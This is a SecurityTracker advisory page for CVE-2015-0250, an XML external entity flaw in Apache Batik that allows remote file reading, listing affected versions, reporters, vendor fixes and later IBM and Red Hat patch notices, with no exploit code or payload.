SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   Apache Batik Vendors:   Apache Software Foundation
Apache Batik XML External Entity Processing Flaw Lets Remote Users Obtain Potentially Sensitive Information
SecurityTracker Alert ID:  1032781
SecurityTracker URL:  http://securitytracker.com/id/1032781
CVE Reference:   CVE-2015-0250   (Links to External Site)
Updated:  Jul 3 2015
Original Entry Date:  Jul 3 2015
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 1.0 - 1.7
Description:   A vulnerability was reported in Apache Batik. A remote user can conduct XML external entity attacks.

A remote user can supply specially crafted XML External Entity (XXE) data to the target interface to read files on the target system with the privileges of the target service.

Nicolas Gregoire of AGARRI and Kevin Schaller of ERNW each separately reported this vulnerability.

Impact:   A remote user can read files on the target system with the privileges of the target service.
Solution:   The vendor has issued a fix (1.6.1, 1.7.1, 1.8) [in March and May 2015].

The vendor's advisory is available at:

http://xmlgraphics.apache.org/security.html

Vendor URL:  xmlgraphics.apache.org/security.html (Links to External Site)
Cause:   Access control error
Underlying OS:  Java, Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jul 3 2015 (IBM Issues Fix for IBM WebSphere Portal) Apache Batik XML External Entity Processing Flaw Lets Remote Users Obtain Potentially Sensitive Information
IBM has issued a fix for IBM WebSphere Portal.
Aug 27 2015 (IBM Issues Fix for IBM WebSphere Application Server) Apache Batik XML External Entity Processing Flaw Lets Remote Users Obtain Potentially Sensitive Information
IBM has issued a fix for IBM WebSphere Application Server 7, 8, and 8.5.
Jan 15 2016 (Red Hat Issues Fix for JBoss BRMS) Apache Batik XML External Entity Processing Flaw Lets Remote Users Obtain Potentially Sensitive Information
Red Hat has issued a fix for JBoss BRMS for Red Hat Enterprise Linux.
Jan 15 2016 (Red Hat Issues Fix for JBoss BPM Suite) Apache Batik XML External Entity Processing Flaw Lets Remote Users Obtain Potentially Sensitive Information
Red Hat has issued a fix for JBoss BPM Suite for Red Hat Enterprise Linux.



 Source Message Contents



[Original Message Not Available for Viewing]


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC